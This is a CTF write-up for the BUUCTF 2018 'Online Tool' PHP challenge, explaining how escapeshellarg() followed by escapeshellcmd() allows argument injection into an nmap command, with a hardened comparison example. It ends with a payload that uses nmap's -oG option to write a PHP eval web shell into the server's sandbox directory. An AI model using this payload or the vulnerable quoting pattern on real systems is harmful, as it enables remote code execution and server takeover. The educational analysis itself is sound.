Brief introduction
Challenge source for reproduction: https://github.com/glzjin/buuctf_2018_online_tool (environment: PHP 5.6.40)
Knowledge tested: RCE resulting from the improper combined use of escapeshellarg and escapeshellcmd
Online platform: https://buuoj.cn (the public CTF platform of Beijing Union University); the challenge can also be found on the internal CTF training platform of the Yulin College Principal Association
Process
Simple audit
Opening the page shows the source code. It uses two functions I did not recognise, so I went and read a write-up.
```php
<?php

print_r($_SERVER['HTTP_X_FORWARDED_FOR']);
// A client-supplied X-Forwarded-For header overrides REMOTE_ADDR,
// so the sandbox directory name below is under the visitor's control.
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
    print("1");
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    // The two escaping functions are applied one after the other;
    // this combination is the subject of the rest of the write-up.
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
```
First, get to know the two unfamiliar functions.
escapeshellcmd
escapeshellcmd - escape shell metacharacters
escapeshellcmd() escapes any characters in a string that might be used to trick a shell command into executing arbitrary commands. This function should be used to make sure that any data coming from user input is escaped before it is passed to the exec() or system() functions, or to the backtick operator.
A backslash (\) is inserted before each of the following characters: & # ; ` | * ? ~ < > ^ ( ) [ ] { } $ \ , \x0A and \xFF. ' and " are escaped only when they are not paired. On Windows platforms, all of these characters, as well as % and !, are replaced by a space instead.
```php
<?php
var_dump(escapeshellcmd("xiaohua da wang"));
echo "<br>";
var_dump(escapeshellcmd("xiaohua 'da' wang"));
echo "<br>";
// Five single quotes: four pair up, the fifth is unpaired.
var_dump(escapeshellcmd("xiaohua '''da' 'wang"));
echo "<br>";
```
Result: only the unpaired single quote is escaped in each case.
escapeshellarg
escapeshellarg - escape a string so that it can be used as a shell argument
escapeshellarg() adds single quotes around a string and quotes/escapes any single quotes already present, so that the string can be passed directly to a shell function and be treated as a single, safe argument. This function should be used to escape individual arguments to shell functions that come from user input. The shell functions include exec(), system() and the backtick operator.
```php
<?php
var_dump(escapeshellarg("xiaohua da wang"));
echo '<br>';
var_dump(escapeshellarg("xiaohua 'da' wang"));
echo '<br>';
var_dump(escapeshellarg("xiaohua '''da' wang"));
echo '<br>';
```
Result: every single quote that appears is escaped.
So the difference between escapeshellcmd and escapeshellarg is this: the former escapes only unpaired single quotes, whereas the latter escapes every single quote; in addition, the former escapes a set of special characters, namely:
& # ; ` | * ? ~ < > ^ ( ) [ ] { } $
```php
<?php
var_dump(escapeshellcmd("& # ; ` | * ? ~ < > ^ ( ) [ ] { } $"));
echo "<br>";
```
Reference for further reading: https://paper.seebug.org/164/
Pass the parameter 172.17.0.2' -v -d a=1. After escapeshellarg() it becomes '172.17.0.2'\'' -v -d a=1', i.e. the single quote is escaped first, and then the left and right parts are each wrapped in single quotes and joined, so that the whole thing works as one argument. After escapeshellcmd() it becomes '172.17.0.2'\\'' -v -d a=1\', because escapeshellcmd() escapes the \ and, at the end, the unpaired single quote: http://php.net/manual/zh/function.escapeshellcmd.php . The command finally executed is curl '172.17.0.2'\\'' -v -d a=1\': the \\ in the middle is interpreted by the shell as an escaped \ rather than as an escape for the ' that follows it, so that ' is not escaped and instead pairs with the next ' to form an empty string that simply joins the pieces together. It reduces to curl 172.17.0.2\ -v -d a=1', i.e. a request is sent to 172.17.0.2\ with the POST data a=1'.
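The following is an added example, not code from the original challenge or the seebug article: it contrasts the challenge's escapeshellarg()+escapeshellcmd() chain with a single escapeshellarg() call behind input validation, and runs printf(1) instead of nmap so the shell's word splitting is visible without scanning anything. It assumes PHP 5.6+ with a POSIX sh, and the hostname pattern in quote_safe() is a simplified allow-list chosen for this example.

```php
<?php
// Added example, not code from the original challenge. It contrasts the
// challenge's escapeshellarg()+escapeshellcmd() chain with a single
// escapeshellarg() call behind input validation, and runs printf(1) instead
// of nmap so the shell's word splitting is visible without scanning anything.
// Assumes PHP 5.6+ and a POSIX sh; quote_safe()'s hostname pattern is a
// simplified allow-list chosen for this example.

// The challenge's composition: escapeshellcmd() pairs up the single quotes
// that escapeshellarg() just inserted, backslash-escapes the one it takes to
// be unpaired, and thereby re-opens the word escapeshellarg() had closed.
function quote_vulnerable($host) {
    return escapeshellcmd(escapeshellarg($host));
}

// Hardened composition: accept only something that looks like a host, then
// quote it exactly once; escapeshellarg() alone already yields one shell word.
function quote_safe($host) {
    $is_ip   = filter_var($host, FILTER_VALIDATE_IP) !== false;
    $is_name = (bool) preg_match('/^[A-Za-z0-9.-]{1,253}$/', $host);
    if (!$is_ip && !$is_name) {
        throw new InvalidArgumentException("host is not an IP address or hostname");
    }
    return escapeshellarg($host);
}

// Show each word the shell hands to the program, one per line in brackets,
// using the same "command . quoted_value" pattern as the challenge's system().
function show_words($quoted) {
    system("printf '<%s>\n' " . $quoted);
}

// Constructed inputs: a normal host, and the quote injection from the seebug
// analysis discussed above.
foreach (array("172.17.0.2", "172.17.0.2' -v -d a=1") as $in) {
    echo "input: $in\n";
    echo "  vulnerable -> ", quote_vulnerable($in), "\n";
    show_words(quote_vulnerable($in));
    try {
        echo "  safe       -> ", quote_safe($in), "\n";
        show_words(quote_safe($in));
    } catch (InvalidArgumentException $e) {
        echo "  safe       -> rejected: ", $e->getMessage(), "\n";
    }
}
```

With the injected input, the vulnerable branch prints the host and the three injected words as separate bracketed lines, while the safe branch rejects the value before any command is built.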
nmap parameters: https://blog.csdn.net/qq_26090065/article/details/80285088
nmap has a parameter, -oG, that writes the command line together with the scan results to a file.
The final payload
So our command input is controllable! Then we write it to a file:
?host=' <?php @eval($_POST["xiaohua"]);?> -oG xiaohua.php '
Append the generated sandbox folder name that the page displays to the path and visit the file:
http://6b6aa4fa-cc55-4b5d-8dd9-9ba66a236355.node3.buuoj.cn/4d484018dc3b664c4cc70a3ef2b8e7a3/xiaohua.php
Reference: Online Tool (BUUCTF 2018)